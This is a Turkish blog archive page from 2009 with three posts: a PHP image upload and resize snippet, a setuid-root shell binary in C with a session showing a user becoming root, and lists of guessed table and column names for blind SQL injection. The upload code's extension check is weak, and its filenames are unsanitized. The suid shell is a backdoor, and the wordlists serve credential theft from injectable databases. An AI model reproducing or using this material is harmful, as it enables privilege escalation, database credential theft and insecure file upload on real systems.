Archive for August, 2009

PHP GD resim resize ve dosya yükleme örneği

0 Comments

August 23rd, 2009 in PHP by admin
Örnekte kullanılan kütüphane resize_lib.php dosyasını
http://www.white-hat-web-design.co.uk/articles/php-image-resizing.php adresinde bulabilirsiniz. 
ini_set('display_errors', 1); 
Include("resize_lib.php");
$uploadpath = "./yuklemeler/";
if($_FILES["imaj1"]["name"]!="") {
	if(!preg_match("/(jpg|gif|bmp)/",substr(strtolower($_FILES["imaj1"]["name"]),-3))) die("file extension problem!!");
	if(move_uploaded_file($_FILES["imaj1"]["tmp_name"],$uploadpath.strtolower($_FILES["imaj1"]["name"]))) print '<script>alert("uploaded!!");</script>';
	$image = new SimpleImage();
	$image->load($uploadpath.strtolower($_FILES["imaj1"]["name"]));
	$image->resizeToWidth(250);
	$image->save($uploadpath."minik_".$_FILES["imaj1"]["name"]);
}
print '
<form name="yukle" method="post" action="" enctype="multipart/form-data">
<input type="file" name="imaj1" />
<input type="submit" value="upload it!!" />
</form>
';

Dikkat edilmesi gereken noktalar, öneriler;

  • dosya yüklemesi söz konusu olduğunda form içinde enctype tanımı
  • resize özelliğinin sorunsuz çalışması için PHP’nin GD destekli kurulduğundan emin olun.
  • Güvenlik kaygısı nedeniyle, yükleme yaparken uzantı kontrolü yapmayı unutmayını
  • Dosya adlarının çakışmaması için md5(micro_time()) fonksiyonlardan faydalanabilirsiniz.

Sahibi root olan suid binary kullanımı

0 Comments

August 23rd, 2009 in Security by admin

Sahibi root olan suid binary kullanımı bir güvenlik açığı değildir, unix sistemler üzerinde kullanılabilecek bir özelliktir. Zayıflık gerektirmez. Sistem üzerinde çalışan suid bin uygulamaların veya yapılan yüklemeler için bu özelliğin ne anlama geldiğinin bilinmesi gerekir.

#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
int main (int argc, char **argv ) {
	setuid(0);
	setgid(0);
	execv("/bin/sh",argv);
	return 0;
}

==

ev# gcc -Wall rootla.c -o rootla
ev# chmod +s rootla
ev# exit
exit
% whoami
okan
%./rootla
# whoami
root
# exit

Suid perl kurulumu yaparak perl script ‘lerinin de sahibi oldukları kullanıcı haklarıyla çalışması sağlanabilir. Genelde süper kullanıcı haklarıyla çalışması istenen perl betikleri için kullanılır. Konsolda yürütülen betiklerin süper kullanıcı haklarıyla çalışması için de SUDO uygulamasından faydalanılır.

Blind SQL Injection – tahminleme yöntemi

0 Comments

August 2nd, 2009 in Security by admin

Tablo adları

$tahminiTablolar=array('kullanici','kullanicilar','uye','uyeler','users','user','admin','ident','adminlog','members','member','eq_users','tb_users','tbl_user','login','logging','nuke_users','admins','group_members',
'phpbb_users','administrator','admin_log','pass_admin','wp_users','accounts','adminlogin',
'auth','authenticate','authentication','account','customers','config','conf','cfg','sb_host_admin',
'WebAdmin','super','administrateurs','webmaster','webmasters','webuser','userinfo','userlist','sysadmins',
'manager','memberlist','logs','login','customer','edit','editor','administration','accounts','cms_admin','cms_admins',
'cms_user','cms_users','xoops_users','vbulletin_user','vb_user','user_login','user_logins','user_admin','tb_member',
'tb_members','tb_administrator','tb_login','tb_user','sysadmin','smf_members','smallnuke_members','site_logins','site_login',
'sitelogin','siteslogins','punbb_users','poll_user','phpBB2.phpbb_users','phpBB2.forum_users','phpbb_users','phorum_user',
'nuke_users','nuke_authors','mybb_users','mysql.user','login_admin','login_admins','login_user','login_users','jos_users',
'jos_joomblog_users','ipb.ibf_members','ibf_members','forum.ibf_members','fusion_users','e107_user','e107.e107_user','dbadmins','cpg132_users','chat_users','article_admin','Administratoren','administrieren','4images_users');

Kolonlar

$tahminiKolonlar=array(
'id','uid','userid','username','cst','user','pseudo','pw','pass','sifre','parola','kod','password','uname','login','login_user','memeber_pass','memberpwd',
'login_pass','login_name','userpassword','userpw','userpwd,','member_pwd','memberpw','user_name','name','usr','adminname','admin','adminpass','adminpassword','passwd','adminpasswd','pwd','script','user_login','user_pass','login_passwort','usrname','usrpass',
'usr_pass','userpass','user_password','administrator','usrpw','adminpwd','adminpw','userPassword','Userlogin','Administratorzy',
'Administrator','pWord','passer','Passw','membres','membername','wp_users','usrs','usrnam','usrname','usrn','usernm','useradmin',
'user_usrnm','user_usernm','user_pword','user_pwrd','user_pwd','user_passw','user_email','user_admin','pwrd','pword','psw','passw',
'pass_word','pass_hash','p_word','memlogin','mempassword','members','membername','memberid','member_name','member_id','mem_pwd','mem_password','mem_passwd','mem_pass','mem_login','mail','md5hash','logins','login_username','login_user','login_pwd','auth',
'adminuserid','adminuser','adminemail','admin_userid','admin_user','admin_pwd','admin_password','admin_passwd','admin_pass',
'admin_name','account','accounts','sb_admin_name','sb_pwd');

SQL bindirme açığı bulduğunuz sistemler üzerinde tablo adı tahminlemesi hedeflenen amaç için bazen çok önemli bir role sahip olabiliyor. Yukarıdaki listede kullanılan tablolar çoğunlukla işe yarar. Tablo adı ve kolon tahminlemesi için html kodlarında kullanılan form ve girdi isimleride yine dikkate değer.